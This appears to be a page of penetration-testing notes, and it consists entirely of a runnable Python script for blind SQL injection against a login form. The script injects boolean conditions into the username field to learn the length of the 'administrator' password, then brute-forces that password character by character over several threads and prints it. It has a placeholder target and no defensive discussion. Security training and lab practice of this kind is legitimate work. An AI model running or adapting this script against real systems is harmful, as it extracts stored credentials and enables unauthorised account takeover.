search
Extra Notes

Blind SQL

import requests
import string
import threading

# === CONFIGURATION ===
url = "http://example.com/login"  # Replace with actual target
headers = {"Content-Type": "application/x-www-form-urlencoded"}
success_indicator = "Welcome Message" # Response body
max_length = 100  
thread_limit = 10

# === SHARED STATE ===
found_chars = []
lock = threading.Lock()

# === FUNCTION TO TEST PASSWORD LENGTH ===
def find_password_length():
    for length in range(1, max_length + 1):
        payload = f"xyz' AND (SELECT LENGTH(password) FROM users WHERE username='administrator')={length}"
        data = {"username": payload, "password": "irrelevant"}
        try:
            response = requests.post(url, headers=headers, data=data, timeout=5)
            if success_indicator in response.text:
                print(f"[+] Password length found: {length}")
                return length
        except Exception as e:
            print(f"[!] Error testing length {length}: {e}")
    print("[-] Failed to determine password length.")
    return 0

# === FUNCTION TO TEST ONE CHARACTER ===
def test_char(position, char):
    payload = f"xyz' AND (SELECT SUBSTRING(password,{position},1) FROM users WHERE username='administrator')='{char}"
    data = {"username": payload, "password": "irrelevant"}
    try:
        response = requests.post(url, headers=headers, data=data, timeout=5)
        if success_indicator in response.text:
            with lock:
                found_chars[position - 1] = char
                print(f"[+] Found character at position {position}: {char}")
    except Exception as e:
        print(f"[!] Error testing {char} at position {position}: {e}")

# === FUNCTION TO BRUTE-FORCE ONE POSITION ===
def brute_position(position):
    for char in string.ascii_letters + string.digits:
        if char in "'\"\\":  # Skip problematic characters
            continue
        test_char(position, char)

# === MAIN FUNCTION ===
def main():
    length = find_password_length()
    if length == 0:
        return

    global found_chars
    found_chars = [""] * length

    threads = []
    for pos in range(1, length + 1):
        t = threading.Thread(target=brute_position, args=(pos,))
        threads.append(t)
        t.start()

        if len(threads) >= thread_limit:
            for th in threads:
                th.join()
            threads = []

    for th in threads:
        th.join()

    print("\n[+] Password guessed:")
    print("".join(found_chars))

if __name__ == "__main__":
    main()
PreviousSQL ScriptingNextError Base

Last updated